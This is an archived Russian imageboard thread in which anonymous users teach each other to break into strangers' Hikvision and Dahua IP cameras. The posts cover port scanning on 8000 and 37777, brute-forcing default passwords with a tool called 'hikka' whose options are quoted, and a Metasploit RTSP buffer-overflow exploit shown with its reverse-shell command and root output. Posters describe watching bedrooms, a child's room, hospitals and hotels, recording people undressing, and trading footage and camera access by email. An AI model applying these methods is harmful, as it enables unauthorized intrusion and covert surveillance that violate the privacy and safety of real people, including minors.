24 декабря Архивач восстановлен после серьёзной аварии. К сожалению, значительная часть сохранённых изображений и видео была потеряна. Подробности случившегося. Мы призываем всех неравнодушных помочь нам с восстановлением утраченного контента!
И кстати: хоть что-нибудь возможно сделать с качеством звука? А то все как пережёванные кроты говорят, не ясно нихрена. Или это лишь от камеры зависит?
>>68455 Но я на это пикабу заходил от силы один раз в жизни с целью ознакомиться. Да и вообще в эти треды я вкатился лишь сегодня. Меня интересует лишь работа и не только этой самой iVMS, вот и решил позадавать вопросы в треде. А ты сразу "пикабу, хуябу". Виабу, блять.
Между делом, тут ещё занимаются допилом софтин для подбора стандартных паролей? Хотелось бы пару коммитов сделать, но не впустую чтобы.
и да, вебмрелейтед - тот же офис теле2, но уже ночью. Судя по whois, в Омске.
>>68538 Не проверял, но пока у тебя будет: 'root'@'localhost' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE То ни о какой безопасности разговора нет.
>>68748 Для поиска ip диапазонов используется база хер пойми какого года, с миллионом ошибок, найденная в интернетах. (конечно же планируется ввод нормальной базы)
Для определения местоположения пользователя, используется api sxgeo
Нашел несколько вебок с шлюхами. Как мне лучше поступить, тупо скачать запись или лучше записать с окна? Наверное скачивание слишком палевно будет, не?
Я конечно диванный и в камера-треде впервые, но считаю, что вы бесцельно проебываете годноту. Видел как-то вебм, где тне лет 15 включали всякие смехуечки, а ведь можно было натурально сводить её с ума, конечно на это потребовалось гораздо больше времени, и нужно было грамотно всё придумать, но результат того стоил бы. Сам я ленивый и слишком тупой для этих ваших хакирских программ, а ведь кто-то бы мог.
Антошки, есть аналог хиквижн? Нашел интересную камеру, но при попытке просмотра записей прога виснет намертво и реагирует только спустя несоклько минут.
>>70276 Берешь диапазон айпи, сканируешь на 8000 порт. Полученный список айпи вставляешь в брут. В результате получаешь список камер с логином и паролем. Их смотришь либо через клиент, либо через веб-интерфейс.
>>70278 Ну можешь вручную подбирать пароль к каждому найденному айпишнику. Только ты заебешься,и далеко не на каждом айпишнике с открытым портом висит камера.
>>70283 Вот как всегда. Назовешь малолетнего долбоеба малолетним долбоебом, он в ответ что-то про мамашу сфантазирует и довольный сидит, думает что всех затроллил и оставил последний пост за собой. а на самом деле, лишь еще больше обосрался.
CVE-2014-4880 - Buffer Overflow in the RTSP Basic Authentication Handling
The Metasploit module written for the vulnerability sends a crafted RTSP request that triggers a buffer overflow condition when handling the "Basic Auth" header of a RTSP transaction. Due to this condition the request takes control of the remote instruction pointer and diverts execution to a series of ROP gadgets that pivot the stack to an area within the request packet itself in order to continue execution there. The code placed in this area in the case below is a standard reverse shellcode generated by Metasploit.
./msfcli exploit/linux/misc/hikvision_rtsp_bof payload=linux/armle/shell_reverse_tcp RHOST=192.0.0.64 LHOST=192.0.0.2 SHELL=/bin/sh SHELLARG=sh E [] Initializing modules... payload => linux/armle/shell_reverse_tcp RHOST => 192.0.0.64 LHOST => 192.0.0.2 SHELL => /bin/sh SHELLARG => sh [] Started reverse handler on 192.0.0.2:4444 [*] Command shell session 1 opened (192.0.0.2:4444 -> 192.0.0.64:52021) at 2014-09-15 18:09:03 +0200
id uid=0(root) gid=0(root)
No authentication is required to exploit this vulnerability and the Metasploit module successfully demonstrates gaining full control of the remote device.
>>70468 > Ананасы, комунибудь удалось юзать вот это?
Удавалось, и работает, только какой смысл? Этоже просто Buffer Overflow, т.е. после запуска девайс виснет и все, или я чтото не понял? в мануале мелькает full control of the remote device но как его получить не понял, и вообще какой может быть фулл контроль если девайс вешаеться из за перепелнения буфера...
>>70506 Ну, если получить на камере шел, то так можно будет любую hik-камеру, у которой есть rtsp, без пароля смотреть. Другое дело, что быдло итт никогда такое не реализует.
Окей анонсы, вкатился в ваш тредж. Напиздил айпишников из нужного города, проверил половину - наткнулся на один брошенный зоомагазин. Остальные без устройств. Нахуй так жить? Есть способ избавляться от таких ойпи без камер?
>>70553 Нет, у меня всё в порядке, уже обжился. Быстро доходит. Сегодня пришёл в камеротред впервые, чтобы узнать как брутить айпишники - завтра слил домашние видео дочки Абрамовича.
Анончики, использую vnc для скана, он записывает результаты в таком виде как на пике, я правильно понял, что эти айпишники надо в клиент пихать? И сколько из 100 будут рабочими по статистике?
>>70558 Там ридмишник всё довольно полно объясняет. Создай батник, пропиши трединг. В хостс запили айпи, в пассфордс - словарь паролей, в логин - админ/словарь логинов. Нажал бат - пришёл к успеху.
-logins, -passwords — files where your logins and passwords are stored; it looks for «logins» and «passwords» by default; -check — very useful, but still experimental option which allows to check a host before trying to log in (I did some reverse-engineering and I'm not really sure if everything is OK); -shoots — a directory where pictures from cameras will be stored; it doesn't download pictures by default; -threads — there's no multithreading until you define in how many threads you want to do a job; -csv — write results to CSV file. Please note that it is hardcoded to read IPs from file called “hosts”!
>>70567 Конечно, я именно так и задумывал, что бы твой комп поиметь. Залезь на архивач, в последних тредах автор эти билды выкладывал по мер готовности, ссылки наверно еще живы.Тут они просто в одном месте собраны.
>>70570 Тут два варианта, либо брать данные камеры из названия скрина (айпи,логин,пароль) - тем более ты же все равно сперва посмотришь что нашлось, а не будешь все подряд подключать. либо вдобавок использовать команду -csv ip.csv - все будет записано в файл ip.csv (если я не ошибся с форматом команды, я не пользовался этим никогда, мне легче из названий нужные камеры выдергивать).
>>70586 Почитай документацию по камерам. У тебя в клиенте показывается модель камеры - узнай ее характеристики и все. Но в любом случае зависит еще и от параметров подключения - если аудио не подключили, то на наличие динамиков похуй.
>>70594 Хз, месяц смотрю, потом даже включать лень. Проходит две-три недели, натыкаешься в тредах на видео с камер, и снова начинаешь. Но еще от камер зависит конечно, есть камеры которые я постоянно просматриваю, даже если на поиск новых и на остальные забил. У каждого по своему в общем.
Если бы всякие крысокуны пароли вечно не меняли, то было бы здорово. Я знаю, тут есть доброаноны, может сделаем какого-нибудь гостя с паролем единым для всех камер(о котором только сосачекуны буду знать), если уж пароли на админку меняете?
Есть еще минимум две борды на которых эти треды есть активные - и друг друга там мониторят, так что знать будут все. А еще и пикабу, и вконтактик и еще куча всего наверняка. В любом случае уже предлагалась куча решений - ничего в итоге не выходит. Крыса-кунов не изменишь. Забей просто на это - камер хватит надолго. Отваливается одна - появляется другая, не хуже.
>>70600 >камер хватит надолго Дебил. Камер уже нет. Какой-то год назад они просто сами в сканер запрыгивали, а теперь - повезёт, если хоть одну в месяц найдёшь. И скоро их совсем не останется.
>>70603 >ты кто Тебя это не касается, мдкшник. >Никакой разницы Ты либо не искал, либо пиздишь. Годнота исчезла буквально за пару месяцев, после вскрытия темы. Хвала богам, что у этого быдла не хватает мозгов на не hik-камеры, а то вообще можно было бы закрывать всю движуху.
>>70605 Если речь идёт про камеры, то под годнотой подразумеваются камеры в спальнях или в живодёрнях (хотя, это на любителя). Все остальные заправки и парикмахерские - говно.
>>70606 Со спальнями согласен, но я не вижу что бы их реально намного меньше стало. Если брать не РФ, то 12-15 в месяц у меня проскакивает. Хотя меня больше интересуют больницы, салоны красоты и крупные отели.
>>70621 Я вчера в 22.00 сел и к пятому часу ночи во всем разобрался. А ты хочешь, чтобы я все за тебя сделал? За просто так? Еще и персональный гайд писать? Охуел? Сиди дрочись.
>>70624 ЧЕМ ИСКАТЬ КАМЕРЫ? Стандартный nmap для скана портов. masscan и zenmap быстрее, но на больших рейтах проебывают хосты.
Типичные порты камер: 8000 и 37777, некоторые камеры имеют только веб-интерфейс на стандартных 80 и 8080 портах, но ими занимаются люди, открывающие новые, нестандартные пути.
Каким тупаном нужно быть, чтобы нихуя тут не понимать? Зачем ему порты, блядь. А пакеты ты через астрал ловить будешь? Когда изучишь стек TCP/IP, возвращайся.
>>70625 За час и я смог запустить первую камеру. А все автоматизировать, чтобы после скана он мне чистые айпишники выдавал, чтобы хикка мне после этого на блюдечке все приносила, начать базу делать, все это уже ночью. Но все равно иди нахуй, да, умник
Анонимекусы, киньте вебм с камеры, гда три пидора на кровати пекаются. Там ещё одного склоняют головой к хую, а он такой морозится, типа нее сосать не буду, я ж не пидор какой-то.
>>70702 Но он уже в край заебал. Ничего не нравится ему, хаккер мамкин, блять. Если бы не анон с головой, сейчас бы сидел в вебм треде, писюн дергал на школоеблю.
>>70710 Я тут изредка могу запостить какой-нибудь видосик и уйти в туман, типа видеорелейтеда. Но вот так планомерно сидеть и вайпать тред хуйней и продавать/обмениваться камерами? Да пошел ты нахуй. Из-за вас все камеры передохли, уебки.
>>70711 > Из-за вас все камеры передохли, уебки Так я сижу и просто палю, блять, ты болен? Сменив пароль, думаешь этого не заметят, после того как у них перестанут работать камеры? Получается, что уебок то ты.
>>70712 Двачирую. Есть уёбки которые палят хозяевам инфу, меняют пароли и включают джона сину, а есть истинные ценители, которые просто сидят по 40 человек и смотрят. И убили камеры именно первые.
>>70715 К слову Гостевой пароль с доступом к записям оставил открытым, если что. Только не плачь. надеюсь ты понял намек с жирным шрифтом. Пароль стандартный двачевский помноженный на 3
>>70732 Ебаный, в рот, не всем повезло родиться нердом без перспектывы завести друзей, чтобы читать 24\7 про TCP\IP протоколы. Вот на пике, мы же не просто так 8000 порт указываем?
>>70734 >Ебаный, в рот, не всем повезло родиться нердом без перспектывы завести друзей, чтобы читать 24\7 про TCP\IP протоколы. Вот на пике, мы же не просто так 8000 порт указываем? Да любой сканируй, лучше 5432 И в поле IP вписывай 127.0.0.1 - базарю, много камер жирных со шликающими долями, воскресшим братом и содомитами на живодерне.
>>70756 >>70754 Там есть в других классах ЖК мониторы, и в паре аудиторий больших проекторы стоят. Может просто решили не менять технику которая пока работает.
Столкнулся, с такой проблемой. Пихаю 1к ip в хост-хикку он сначала нормально ебенит, и примерно в первых 40 ip 15 рабочие, потом все мертвое, изредка попадаются живые. Я удалил первые 40, запустил снова, и там где он писал что камера мертва, нашел еще штук 20, это опять в первых 30-50ти адресах. Как это можно исправить?
Анончик, а ты можешь выдрать базу отсюда - http://ru.smart-ip.net/ - более точная и новая, а то в моей мухосрани твои обе базы показывают 7 айпишников всего, как в 2005-ом.
>>70821 > к урокам готов? > пиздуй во вк > мамка не наругает? Тоже не люблю всяких долбоебов, но вот эти намеки, типа оппонент школьник на том же школоуровне находятся и бесят меня похлеще самих школьников.
>>70826 Уж точно не опускаться до их уровня. Вот заметил ты у него яндекс-браузер. Тебе печет, что потенциальный говноед зашел в твой тредик. Узнай сначала, такой ли говноед он на самом деле, вдруг это его батя пользуется браузером. А ты просто всех подряд без разбора говном поливаешь. Это ведь ты тут с сажей отписываешься? У меня уже сложилось о тебе мнение, как о хуе, который все в жизни просрал и теперь недоволен своей жизью и сидит вечно злой на всех пердит как старая бабка.
>>70827 >Уж точно не опускаться до их уровня. Тогда они тебя не поймут. Точнее, твой посыл не поймут, будут думать, что им тут рады. inb4:игнорировать - уже наигнорировались, теперь харкач - филиал вконтакте и пикабу.
А если батя стрингами пользуется, то хоть пусть скрывает это. Но он даже не попытался, а значит считает, что это - ок.
>>70835 Мое мнение такое: если ты достойный человек, то и общаясь с быдлом веди себя достойно. Быдло чует, что оппонент выше их и им неприятно, что самое важное они даже не поймет, от чего им печет. А общаясь с ними на том же языке, ты тут же проигрываешь, т.к. ты на их территории, для них это нормально, а у тебя печет.
Много ты ты знаешь отцов, которые обучены компьютерной грамотности? Моему так вообще похуй с чего сидеть и как, я сделал ему на рабочем столе 4 ссылки и пиздец. Ему большего и не надо. И я уважаю его индивидуальные особенности.
Финансовые аналитики /po, игровые эксперты /vg и вебмастера отмечают первое сентября - дуют кальян и пьют пиво. >>70851 Может тебе еще и фингербокс как заказать рассказать ?
>>70821 Иногда удобнее иметь несколько браузеров под разные аккаунты, чем в одном переключать профили/куки. Да, дети хрома - такие же не_браузеры, как и он сам, но все же.
>>70889 Ты лучше сетку тамошнюю поищи, дырки в нетбуке и запили ей радмин-ремкам. Это же +100 к лулзам по сравнению с классическим радминоебством - тут камера при выключении пеки не выключается.
есть лэймcкан, оставшийся со старых рaдмин тредов, кто-нибудь брутил камеры вбивая в настройках порты 8000 и 37777? или он только исключительно для рaдмина на 4899 годен?
Ловите ньюфага, нашел несколько ip с открытым 8000, добавляю в ivms, пароль и логин оставляю по умолчанию и нифига не происходит. Кому не жалко вбросьте ненужную работающую камеру чтобы проверить, может у меня роутер/провайдер блочит входящий трафик по этим портам.
>>70904 Спасибо,теперь проверил - работает. Только очень тормозит ivms, долго переключается по камерам. И сразу же следующий вопрос - на этом камере пароль нестандартный , неужели нужно по каждому ip проделывать двойную работу, находить открытый 8000 порт и потом вручную подбирать к нему пароли 1235, admin, и.тд?
>>70905 Просто нашел порт и пытаешься сразу коннектиться? Там может быть что угодно, но даже если там радмин, он может быть запаролен, точнее, не может быть не запаролен, лол.
>>70903 > пароль и логин оставляю по умолчанию По какому умолчанию, наркоман? Пустые логин:пароль? И с чего ты взял, что твое умолчание совпадает с реальными паролем и логином?
>>70908 Скачал хикку, в файл хостов добавил хосты, запустил хикку, теперь идет подбор паролей в один поток, можно ли как-нибудь увеличить кол-во потоков? Файла с настройками в билде не нашел.
>>70916 Не забывай вот эту команду указывать -csv ip.csv Хикка как правило почти не берет скрины если залогинилась не под админом, соответственно данные с этих камер будут только в файле. И список камер к которым не удалось подобрать пароль будет в том же файле. Их можно в отдельных список потом забрать и прогнать снова через хикку уже с большим словарем.
>>70916 башмаки чьи то появились. На одной из камер постоянно вылазит на главный экран какая то "тревога датчик движения", это можно как-то можно отключить?
>>70917 Почему в этот ip.csv заносятся не все удачные попытки? Когда шло сканирование в консоли видел много подборов, а в конечном файле вообще мало и плюс несколько вообще ip:8000 без пароля.
Imvs очень сильно тормозит, постоянно пропадает поток, медленно обновляются окна, какая-то слишком громоздкая программа, есть ли упрощенные и нелагающие альтернативы?
>>70928 В файл заносятся все найденные камеры. Без пароля ты имеешь в виду такое - 5.35.113.170,8000 ? Это камеры к которым пароль не подобран просто, либо используй для них более широкий словарь, либо забей. IVMS какая версия у тебя?
>>70929 Версия 2.00.01.04, По паролям хотелось бы уточнить, какая минимальная и максимальная длина пароля, влияет ли регистр, можно ли использовать кириллицу?
>>70950 Типичный центро-пидорский дезигн хипстерка. "Посмотрите на меня, я нихуя не представляю, но я всё равно важнее и нужнее вас, быдло!". К тому же сзади есть пространство для прохода - любит, когда кто-то пристраивается сзади.
>>70955 Вот тут ты и обосрался, маня- живет там обыкновенная супружеская пара в возрасте, 45-50 лет. А ты живи в своей ссаной однокомнатной хрущевке, зато не "заднеприводно-хипсторской". Поссал в ротешник человеку-шаблону.
Сталкиры, я правильно понимаю, что для поиска камер с помощью хикки не на 8000 порте, надо в исходнике изменить всего 2 значения? [CODE]static Options options = { 1, // Concurrency 2, // Verbosity level 8000, // Port false // HPR_ping[/CODE] и тут [CODE]void brute_camera(const std::string ip) { if (options.check_cameras) { if (HPR_ping(ip, 8000) == false) { if (PRINT_EVERYTHING) std::cout << ip << " is dead!" << std::endl;
Чем можно смотреть смотреть камеры без установки IVMS? На работе хочу время скоротать, но устанавливать сторонний софт возможности нет. Может есть какая lite версия?
>>68165 (OP) Ребятушки. Вы всё равно тонны говен просматриваете. Если будут попадаться камеры из торговых центров и моллов разных мухосраней — кидайте адреса, пожалуйста, сюда. С любовью, мимо недомаркетолог.
>>71094 Статистику собрать о телопередвижениях покупателей. Конкретно — о посещаемости фудкортов/столовок/автоматов в течение дня. Аксакалы говорят, что надо на месте сидеть с блокнотом, но я ж хикка, да и 21 век на дворе.
>>71096 > везде всё рандомно > статистика ничего полезного тебе не даст Но статистика так и работает: ты берёшь кучу малосвязных на первый взгляд фактов, анализируешь и получаешь из этого полезную информацию с циферками и допусками. Чем больше фактов — тем меньше допуски.
Если вы находите камера и она без жесткого диска, не следите же Вы за ней целый чтобы записать годноту? Можно как-нибудь сделать, чтобы видосики заливалась в облако например?
>>71145 Not bad. Анон, запиши полностью - как она пришла, разделась и т.д., и выложи на какую-нибудь мегу - будет слепящий вин. С меня тоже что-нибудь - ну например игроебля на часик.
>>71184 Оповещение на почту. Можно настроить камеру на детекцию тревоги - и она будет отсылать на e-mail сообщение, возможно в этом сообщении будет и новый ip, хз
>>71188 У каждой камеры дофига настроек и разбираться долго, может кто-нибудь в треде уже реализовал, то что мне нужно, не сканить же диапозон нужной камеры по айпи, который меняется каждый 24 часа.
>>71189 >>71190 Если вы, дегенераты, так и не поняли, к чему я клоню, то намекну потолще: попытайтесь сделать это прямо сейчас на какой-нибудь камере. Не "ко-ко многа букаф ни осилить((((((", а попытаться это сделать, прежде чем пиздеть хуйню.
Сап хацкеры. Есть 4 камеры 1 пик 2 из них не работают возможно отключены хозяином. Есть доступ в админку 2 пик. Вопрос: как включить оставшиеся 2 камеры?
>>71195 Ты уверен что они в наличии вообще эти камеры? Ты подключился к видеорегистратору, у которого несколько каналов, по каждому из которых идет картинка. Но только если есть то, что эту картинку передает.
>>71195 знаю я эту камеру. На отключеной камеры кровать где наверное спят мама с сыном, но её включает когда хозяйка уходит и отключает когда возвращается. Можно только надеется что забудет отключить
>>71224 По-твоему у камеры стоит смтп-сервер? И любой поп-клиент не пошлёт нахуй в блеклист подозрительное письмо с хуй пойми какого адреса? Ну попробуй, хуле. Умник, блядь.
>>71226 Ты в камере прописываешь адрес любого SMTP сервера, камера к нему коннектится и отправляет письмо на твой емэйл. К любому SMTP, долбоеб, хоть gmail на самом деле нет, некоторые прошивки косоруких не могут нормально в SSL/TLS, но по 110 порту работают Ты получаешь письмо, смотришь хэдер, в нем IP отправителя, т.е. камеры.
>>71228 >камера к нему коннектится и отправляет письмо >и отправляет письмо Лол. Наводящий вопрос: А зачем камере коннектиться к смтп-серверу, если она сама умеет отправлять письма? >>71229 Ок, отправит тебе в хедере адрес граничного шлюза. Дальше что?
Прежде чем кукарекать - СНАЧАЛА ПОПРОБУЙТЕ, бляди тупые.
>>71189 >чтобы камеры сами коннектились к моему компу с постоянным ip ЛОЛ. Товарищ майор, можете уходить из треда. Скоро эти дебилы сами к вам косяками повалят. Вы еще и не рады будете такому росту раскрываемости.
>>71233 >Через смтп и отправляет Как же так?! Но ты же написал >камера к нему коннектится и отправляет письмо на твой емэйл. >камера отправляет письмо на твой емэйл. Камера же сама отправляет!! Ты сам так написал, о, гуру технологий!! Не через, дебил, а смтп-сервером и отправляет. Сервер пакет шлёт, а не камера, дебил.
>>71234 Ранише были видяхи от суперхакера777 где он показывал как всем пользоватся и спрашивал кому надо на чистыз крестах кто-то. Давно не заходил и те треды утонули. Скиньте гайд.
>>71236 Ты кокой-то ебанутый. Да, камера отправляет письмо, да, с помощью смтп сервера, что не так? Мне блядь уточнять траффик до уровня TCP пакетов кто кому что передал?
>>71242 Камера отправляет пакет смпт-серверу. Смтп-сервер отправляет пакет на указанный поп-клиент. А НЕ КАМЕРА ОТПРАВЛЯЕТ ПАКЕТ НА ПОП-КЛИЕНТ, МУДЕНЬ Как следствие, на поп-клиент приходит пакет от смтп-сервера, а не от камеры. Хохол.
>>71243 Оу, ок. А как этот динамический ип общается, например, с сервером гугла? Он напрямую с сервером связан витой парой, да? И почем утакой ип - динамический? У них там что, бегают тех-инженеры и проводки перетыкивают?
>>71244 >А НЕ КАМЕРА ОТПРАВЛЯЕТ ПАКЕТ НА ПОП-КЛИЕНТ, МУДЕНЬ А я этого нигде и не писал, это твои упоротые фантазии. Вот что я писал >Ты в камере прописываешь адрес любого SMTP сервера, камера к нему коннектится >SMTP сервера >к нему
>>71246 Не пизди, петушок, ты писал: >камера к нему коннектится и отправляет письмо на твой емэйл. >и отправляет письмо на твой емэйл. Перевожу что ты написал: камера коннектится и отправляет письмо. Поздно жопкой вилять, манька.
>>71248 Просто какие-то дебилы в треде собрались и хуйню несут, блядь. Нет, чтоб проверить свою хуйню - неет, будут нести ещё большую хуйню, чтобы защитить предыдущую хуйню. >>71249 Ну так вперёд, блядь, хули ж ты ждёшь? Давай, неси нам свет истины и ит-мудрости. Продемонстрируй эту технологию инопланетную.
>>71247 Ты точно сетевыми протоколами объебенился. "Отправить письмо" не означает "передать пакет в соответствии с RFC100500". Человек открывает яндекс браузер, заходит в вебпочту и отправляет письмо, при этом про SMTP знать не зная.
>>71262 Лол. Анон проебывает камеры потому что на них меняют пароли. Поэтому надо менять пароли на камерах, что бы анон их не проебывал из за смены паролей. Так, да?
>>71262 Да весь мир сканит и хранит годноту у себя на компе или закрытых форумах, а мы тут на дваче вместе со всеми друзьями сидим ничего не видим, пусть уж лучше тут будет хоть что-то с камер, а евреи все равно все просмотреть даже физически не смогут
>>71272 поставил GO и msys2 выполняю Makefile Admin@microsof-110a1d MSYS ~ $ /c/hikka-master/Makefile /c/hikka-master/Makefile: line 4: all:: команда не найдена /c/hikka-master/Makefile: line 6: linux:: команда не найдена /c/hikka-master/Makefile: line 7: /c/Go/bin/go: cannot execute binary file: Exec format error cp: не удалось выполнить stat для «lib/Linux/libhcnetsdk.so»: No such file or directory cp: не удалось выполнить stat для «lib/Linux/libHCCore.so»: No such file or directory
Анон, подскажи что происходит? Admin@microsof-110a1d MSYS /c/hikka-master $ /c/hikka-master/Makefile /c/hikka-master/Makefile: line 4: all:: команда не найдена /c/hikka-master/Makefile: line 6: linux:: команда не найдена # runtime/cgo C:\msys32\tmp\go-build154692806\runtime\cgo\_obj\_cgo_main.c:1:0: ошибка: ключ -fPIC проигнорирован для целевой машины (весь код позиционно-независимый) [-Werror] int main() { return 0; } ^ cc1: all warnings being treated as errors
>>71259 во-первых, галку SSL, очевидно, для gmail надо включить во-вторых, не факт что именно эта прошивка будет по SSL работать в-третьих, нужно еще настроить события, по которым отправляется email - по детектору движения, или периодически, плюс еще есть фильтр по периодам времени и дням недели, в которые не отправлять, я в своей камере через в веб-интерфейс настраивал, и то заебался, через хикку хз как.
>>71311 Недавно заменил по нескольким причинам, включая эту, сейчас asus rt n56u. Интернет все равно отваливается, понятно что если бы банил провайдер то нужно было бы переподключаться к самому инету, а тут тупо по локалке как будто перестает поступать интернет
КАКОЙ ДОЛБАЕБ ВЫТЕКАЕТ В /B/? ЗАЧЕМ ТЫ ЭТИМ АУТИСТАМ ПАЛИШЬ ГОДНОТУ? ПО ОЛОЛОКАТЬ АЗАЗАЗА С ЛАЛОК СУЯ ИМ ВИШМАСТЕРЫ? ИЗ-ЗА ТАКИХ КАК ТЫ МРАЗЕЙ СОТНИ КОДНЫХ КАМЕР УБИЛИ, СОТНИ ПИДАР СУКА
>>71319 >Моя. Если не съебешь, то пароль сменю. Ты блядь шланг гофрированный, кто ты есть чтобы пароли менять а? Смойся назад туда откуда тебя высрала твоя мамаша шлюха и не высовывай своё мохнатое рыло, долбоёб. Это касается всех дохуякрутых выблядков-хацкеров.
>>71474 Если спермерка - а у тебя точно спермерка судя по вопросу - то стиви баллмер отключил тебе нахуй стереомикшер по умолчанию - пиздуй в Панель управления - Звук - Запись - ПКМ на устройствах - галочка "показывать отключенные устройства" - и включай свой стереомикшер. Дальше сам. С тебя сиськи с камер, только годные.
А подскажите такой момент: ппроскнировал диапазон ойпишнегов я утилитой Router Scan от Stas'M. Он выдал к роутерам кучу паролей. В роутер зайти можно, можно менять его настройки. Сменить прошивку, например, сделать wifi без пароля и прочее. В некоторых моделях роутера есть галка "отобразить пароль WAN". В Асусах, например. Под этим паролем можно зайти в личный кабинет абонента, посмотерть все дела - договор, сменить тарифный плат и всё такое.
Вопрос: Возможно ли проникнуть в компьютер, если есть доступ к роутеру? Ну, т.е. на рабочий стол, например. А там и до доступа к устройствам PnP недалеко. Просмотреть изображение с камеры встроенной в ноут или подключённой отдельной?
>>71503 Нет, плюс выкинь это говно сканерное. Тру пацаны знают что Router Scan от Stas'M ставит скрытый бэкдор и включает тебя в ботнеты, он то пароли дает но какой ценой для тебя.
>>71508 из вариантов у меня в голове вертится, чтобы перенаправлять поток роутера через платный траффик или как-то его заразить, чтобы он смски на короткие номера отправлял или дозванивался. Ну, или заходил на ютуб и просматривал ролики. За просмотры ютуб кидает копейки.
>>71556 Говорю по делу: нахуй пошёл, дебила кусман. Хули вы, дегенераты, блядь, вообще сюда припёрлись? Идите на пёзды дрочите или рулетки крутите, инвалиды. Вон, ифон очередной вышел, пиздуйте его обсуждать, жертвы абортов, нахуй тут срать своим невъебенным потоком архипиздически тупого говнища?
Как сбросить пароль на заводской? Советуют программку SADPK какую-то, установил её, но она не видит камер вообще никаких, вероятно потому что они не в моей локалке.
Вот смотрю я на камеры азиатов и понимаю, что еще неплохо живу. Работают и спят в одном и том же месте в обнику с коллегой мужиком. Прямо семейная идилия.
Насколько я понял, IVMS используется только для камер hikvision. Т.е. из всей той массы айпишников, которую нацедили KPortScan-ом надо отсортировать камеры именно этой марки, а потом из отсортированного - те, у которох дефолтные логин/пасс. Вот такая ещё есть приблуда: NVMS, которая так же прикреплена к камерам RVI. У них там свои пары логинов и паролей. Правильно ли, что с IVMS не получится зайти в камеру RVI, даже с правильным паролем?
Какое ПО есть для других камер? Или, может быть, как-то они покупаются по назначению - для складов в основном одной марки, для жилых помещений - другой. Может, по ценовому диапазону они отличаются, типа, на склад можно и хлам какой поставить, а вот домой нужна получше, или наоборот?
>>71704 Все годные камеры годятся и на склады с магазами и в хаты но они читаются тока в хикке - это обсуждалось уже. сколько годных камер снято через рви - ни одной.
>>68165 (OP) Чем брутить порты?Еще в начале лета была прога от суперхакера,последняя умела в винде,но только на 8000 порту,какая последняя версия сейчас или может есть иное?
>>72901 если руки не из жопы растут, можно легхко изменить ишодник и перекомпилировять ... даже не зная го.
Я вобще создал свою монгофункциональную программу в питоне катороя помима брута умеет импортировать камеры прямо с шодана, потом записывает результаты в скюлайт базе.
А ещё хакает тренднет камеры ... но это уже не интерессно когда есть хиквижн
>>72937 да, я уже догадался. переклинило чот, в полной уверенности думал, что обязательно поменяли с времен старых тредов. но все равно спасибо, добряш.
У кого есть че на обмен? Пароли не меняю интересует фап-материал ;желательно в хорошем качестве, камеры в квартирах молодых семей, ну ты понел. Шлите скрины сюда [email protected]
Как поставить на проскану сразу несколько айпи? Я слишком туп, максимум, что смог - из файла с айпишниками вручную копировать, вставлять в ивмс и так десятки раз, пока не найду годную, но в одном из тредов прочитал, что можно сделать автоматический скан сразу кучи айпи и те, к которым подойдет admin_12345 сами появятся в списке на просмотр.
Аноны, хикка не собирается с src/hikka.go:104: cannot use (_Ctype_NET_DVR_JPEGPARA)(unsafe.Pointer(&imgParams)) (type _Ctype_NET_DVR_JPEGPARA) as type _Ctype_struct___4 in function argument src/hikka.go:183: cannot use (_Ctype_NET_DVR_DEVICEINFO)(unsafe.Pointer(&device)) (type _Ctype_NET_DVR_DEVICEINFO) as type _Ctype_struct___5 in function argument
>>73246 Мне вообще нахуй не всралось пароли менять, лень. Я не могу понять нахуя вообще их менять? Просто смотреть не проебывая никак? Хотя похуй. Просто заебали такие "умники" как ты, "Я пароль сменю никто не сможет мне помешать больше" кроме хозяина камеры, который так быстрее пропалит.
>>73255 хикка не собирается с src/hikka.go:104: cannot use (_Ctype_NET_DVR_JPEGPARA)(unsafe.Pointer(&imgParams)) (type _Ctype_NET_DVR_JPEGPARA) as type _Ctype_struct___4 in function argument src/hikka.go:183: cannot use (_Ctype_NET_DVR_DEVICEINFO)(unsafe.Pointer(&device)) (type _Ctype_NET_DVR_DEVICEINFO) as type _Ctype_struct___5 in function argument
>>73320 Cажескрылус, назови мне стандартный софт для брута внк. >>73321 Меня интересует выхлоп: примерная доля камер с паролями, подверженными быстрому бруту.
>>73327 Я мимо проходил, не местный. Чё за внк? Пароли стандартные. На 37777 либо admin/admin либо 666666/666666 но 37777 это нихуя не Hikka - это Dahua
>>73328 >Я мимо проходил, не местный. Дык, мы тоже не местный. Чё за внк? Стандарт, можно сказать олдскул айпи камер, гугл в помощь. >либо 666666/666666 Не знал, чё правда? >Hikka Но hikvision и поделие суперхаки это как бы разные вещи, так к слову. >>73329 Я спросил блядь, может кто-нибудь смотрел. >про радмин вспомни Надо будет вспомню, ну и пиздец, развелось имбецилов на реактивной тяге.
>>73473 Аналогично, есть много стоящих камер. Хотелось бы обмениваться годнотой с проверенным аноном, а не крысой какой. Кто хочет меняться, пишите на [email protected]
>>72642 Дрочат. Вчера вечером такого видел. Жена из комнаты вышла, а он достал и начал дрочить. Правда не кончил вроде, но минутку так активно его подёргал.
Мне кажется эту тему можно уже закрывать, тут остались одни зашуганные жлобы с "кинь ip на мэил/нет, ты первый". Я конечно понимаю что набежало быдло меняющее пароли и срущее везде, но и от вашей тут посиделки тошнит не меньше. мимоньюфагвслежке
>>74117 Есть что годное? Интересую тянки терябящие свой пельмень. Можно поменяться. Ток не из Рашки, а то Майор не дремлет. [email protected] пиши вообщем)
>>74122 если камера без веб интерфейса, то это взлом. если же камера имеет веб интерфейс то ответственность ложится на самих хозяев камер. ну и смотря каким способом ты нашел камеру и как пароль подобрал.
>>74228 Ответа подождать надо. Лет пять. Как освободится, из-за нормального компа и напишет. А то с телефона неудобно писать и от шмонов его надо тырить по нычкам.
>>74243 Не всех, пиздабол, а только те, что смог найти их кравлер. И не про камеры идёт речь, а про ксакепа, который похакал сайт пидораса в начале треда. Ты понял меня, ебантод?
>>74114 >>74115 >>74117 Можешь дать АЙПИ даже если уже нерабочий. Попытаюсь найти рабочий, есть свои методы. Если найду поделюсь. Скажи страну хотябы. Пиши на [email protected]
